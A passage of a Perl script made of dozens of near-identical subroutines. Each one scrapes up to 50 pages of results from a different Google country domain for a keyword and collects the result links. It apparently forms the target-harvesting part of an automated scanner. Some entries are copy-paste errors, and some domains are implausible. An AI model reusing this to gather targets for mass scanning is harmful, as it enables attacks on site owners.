push(@list,@grep); } } } return @list; } sub googleno() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.no/search?q=".uri_escape($key)."&hl=&cr=countryNO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleno/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlevn() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.vn/search?q=".uri_escape($key)."&hl=&cr=countryVN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlevn/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemobi() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mobi/search?q=".uri_escape($key)."&hl=&cr=countryMOBI&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemobi/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlepl() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pl/search?q=".uri_escape($key)."&hl=&cr=countryPL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlepl/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleid() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.id/search?q=".uri_escape($key)."&hl=&cr=countryID&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleid/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleth() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.th/search?q=".uri_escape($key)."&hl=&cr=countryTH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleth/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesi() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.si/search?q=".uri_escape($key)."&hl=&cr=countrySI&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesi/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleasia() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.asia/search?q=".uri_escape($key)."&hl=&cr=countryASIA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleasia/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleeu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.eu/search?q=".uri_escape($key)."&hl=&cr=countryEU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleeu/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlebe() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.be/search?q=".uri_escape($key)."&hl=&cr=countryBE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlebe/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlehu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hu/search?q=".uri_escape($key)."&hl=&cr=countryHU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlehu/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlelv() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.lv/search?q=".uri_escape($key)."&hl=&cr=countryLV&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlelv/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecoop() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.coop/search?q=".uri_escape($key)."&hl=&cr=countryCOOP&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecoop/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleua() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ua/search?q=".uri_escape($key)."&hl=&cr=countryUA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleua/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletv() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tv/search?q=".uri_escape($key)."&hl=&cr=countryTV&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletv/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleie() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ie/search?q=".uri_escape($key)."&hl=&cr=countryIE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleie/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleco() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co/search?q=".uri_escape($key)."&hl=&cr=countryCO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleco/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleae() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ae/search?q=".uri_escape($key)."&hl=&cr=countryAE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleae/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlepro() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pro/search?q=".uri_escape($key)."&hl=&cr=countryPRO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlepro/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlename() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.name/search?q=".uri_escape($key)."&hl=&cr=countryNAME&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlename/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleorg() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.org/search?q=".uri_escape($key)."&hl=&cr=countryORG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleorg/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemn() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mn/search?q=".uri_escape($key)."&hl=&cr=countryMN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemn/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlebg() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.bg/search?q=".uri_escape($key)."&hl=&cr=countryBG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlebg/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlenz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.nz/search?q=".uri_escape($key)."&hl=&cr=countryNZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlenz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleee() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ee/search?q=".uri_escape($key)."&hl=&cr=countryEE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleee/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlegr() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.gr/search?q=".uri_escape($key)."&hl=&cr=countryGR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlegr/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlept() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pt/search?q=".uri_escape($key)."&hl=&cr=countryPT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlept/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletn() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tn/search?q=".uri_escape($key)."&hl=&cr=countryTN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletn/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleke() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ke/search?q=".uri_escape($key)."&hl=&cr=countryKE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleke/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlefi() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.fi/search?q=".uri_escape($key)."&hl=&cr=countryFI&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlefi/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlehr() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hr/search?q=".uri_escape($key)."&hl=&cr=countryHR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlehr/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlech() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ch/search?q=".uri_escape($key)."&hl=&cr=countryCH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlech/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleil() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.il/search?q=".uri_escape($key)."&hl=&cr=countryIL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleil/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlepe() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pe/search?q=".uri_escape($key)."&hl=&cr=countryPE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlepe/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemd() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.md/search?q=".uri_escape($key)."&hl=&cr=countryMD&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemd/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecc() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cc/search?q=".uri_escape($key)."&hl=&cr=countryCC&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecc/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletel() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tel/search?q=".uri_escape($key)."&hl=&cr=countryTEL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletel/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleim() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.im/search?q=".uri_escape($key)."&hl=&cr=countryIM&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleim/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlekz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.kz/search?q=".uri_escape($key)."&hl=&cr=countryKZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlekz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleuy() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.uy/search?q=".uri_escape($key)."&hl=&cr=countryUY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleuy/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleqa() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.qa/search?q=".uri_escape($key)."&hl=&cr=countryQA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleqa/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemil() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mil/search?q=".uri_escape($key)."&hl=&cr=countryMIL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemil/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlepk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pk/search?q=".uri_escape($key)."&hl=&cr=countryPK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlepk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleis() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.is/search?q=".uri_escape($key)."&hl=&cr=countryIS&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleis/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleuz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.uz/search?q=".uri_escape($key)."&hl=&cr=countryUZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleuz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleng() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ng/search?q=".uri_escape($key)."&hl=&cr=countryNG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleng/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletravel() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.travel/search?q=".uri_escape($key)."&hl=&cr=countryTRAVEL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletravel/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesa() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sa/search?q=".uri_escape($key)."&hl=&cr=countrySA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesa/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googledo() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.do/search?q=".uri_escape($key)."&hl=&cr=countryDO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googledo/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleam() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.am/search?q=".uri_escape($key)."&hl=&cr=countryAM&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleam/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleeg() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.eg/search?q=".uri_escape($key)."&hl=&cr=countryEG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleeg/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlefm() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.fm/search?q=".uri_escape($key)."&hl=&cr=countryFM&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlefm/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlege() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ge/search?q=".uri_escape($key)."&hl=&cr=countryGE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlege/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleky() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ky/search?q=".uri_escape($key)."&hl=&cr=countryKY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleky/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlelu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.lu/search?q=".uri_escape($key)."&hl=&cr=countryLU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlelu/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mk/search?q=".uri_escape($key)."&hl=&cr=countryMK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlepa() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pk/search?q=".uri_escape($key)."&hl=&cr=countryPK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlepk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesg() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sg/search?q=".uri_escape($key)."&hl=&cr=countrySG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesg/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesy() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sy/search?q=".uri_escape($key)."&hl=&cr=countrySY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesy/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleaz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.az/search?q=".uri_escape($key)."&hl=&cr=countryAZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleaz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlela() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.la/search?q=".uri_escape($key)."&hl=&cr=countryLA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlela/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlebd() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.bd/search?q=".uri_escape($key)."&hl=&cr=countryBD&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlebd/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecy() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cy/search?q=".uri_escape($key)."&hl=&cr=countryCY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecy/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesn() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sn/search?q=".uri_escape($key)."&hl=&cr=countrySN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesn/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemuseum() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.museum/search?q=".uri_escape($key)."&hl=&cr=countryMUSEUM&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemuseum/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlegov() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.gov/search?q=".uri_escape($key)."&hl=&cr=countryGOV&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlegov/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletk() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tk/search?q=".uri_escape($key)."&hl=&cr=countryTK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletk/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlenu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.nu/search?q=".uri_escape($key)."&hl=&cr=countryNU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlenu/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlezm() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.zm/search?q=".uri_escape($key)."&hl=&cr=countryZm&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlezm/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleye() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ye/search?q=".uri_escape($key)."&hl=&cr=countryYE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my 